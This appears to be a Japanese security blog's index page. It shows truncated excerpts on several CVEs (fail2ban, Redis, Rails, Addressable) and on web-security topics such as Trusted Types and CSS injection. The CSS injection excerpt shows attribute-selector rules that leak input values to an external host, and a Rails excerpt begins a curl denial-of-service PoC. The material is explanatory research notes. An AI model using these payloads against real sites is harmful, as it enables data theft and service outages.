Fail2ban の mail-whois と呼ばれる機能(Ban の通知を whois 結果付きでメール送るやつ)で CVE-2021-32749 が出ていた。 Possible RCE vulnerability in mailing action using mailutils (mail-whois) · Advisory · fail2ban/fail2ban · GitHub これは mail …

cve.mitre.org 修正コミットはこれ。 github.com PoC は次の通り。テンプレートで利用される変数名を外部から操作できる場合に発生する。 GHSA では High になっているが、このようなケースは少ないだろうと思う。 irb(main):032:0> template = Addressable:…

色々試しつつも、最終的に落ち着いた。次のような感じ。 localhost.sandbox.directory の証明書を acme.sh で取得 localhost.sandbox.directory の A レコードに 127.0.0.1 をセットする 証明書は nginx のコンテナに volume mount する 1. acme.sh で証明書…

従来の User-Agent の問題 現在の UA は多くの情報が入っており、それをデフォルトで送信することはプライバシーの観点からやめたい パースが複雑になるので、バグの原因となりやすい User-Agent Client Hints 従来の UA と同じ情報にアクセスにできるように…

Clear Site Data SPA とかで Cookie とか LocalStorage とか、そういうものを消し忘れてバグる、みたいなのがあるので、ヘッダで消せるようにする提案。 Clear Site Data これで Cookie が全部消える。cache や storage などが指定できる。Chrome M61 で既…

Credential Management Credential Management Level 1 Web サイトが UA に資格情報をリクエストし、UA がそれを使用できるようにする API スキームがダウングレードする場合はクレデンシャルを共有してはいけない(MUST NOT) 呼び出された Origin と Credent…

Trusted Types (TT) とは DOM Based XSS を緩和するための機能。次のような危険な Sink にデータを渡す前に処理する(Trusted Type 型に変換する)ことができる。 <script src> 及び <script> のテキストコンテンツの設定 文字列から HTML を生成するもの innerHTML outerHTML inse…

CSS インジェクションの手法 雑メモです 属性値のリーク 属性セレクタを使う 広く知られている手法。CSS の属性セレクタを使って取得する。 input[value^="a"] { background: url('http://external.host/?c=a'); } input[value^="b"] { background: url('htt…

CVE-2021-29477 Redis <6.2.3, <6.0.13 6.2.3 と 6.0.13 で修正済み STRALGO LCS コマンドで整数オーバーフロー、Remote Code Execution の可能性 https://redis.io/commands/stralgo LCS サブコマンドは longest common subsequence アルゴリズムを実装しま…

Denial of Service in Action Dispatch · CVE-2021-22902 · GitHub Advisory Database · GitHub CVE-2021-22902 Rails ActionPack MIME Type parser DoS PoC: `curl -H 'Accept: text/html ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0;' -X POST…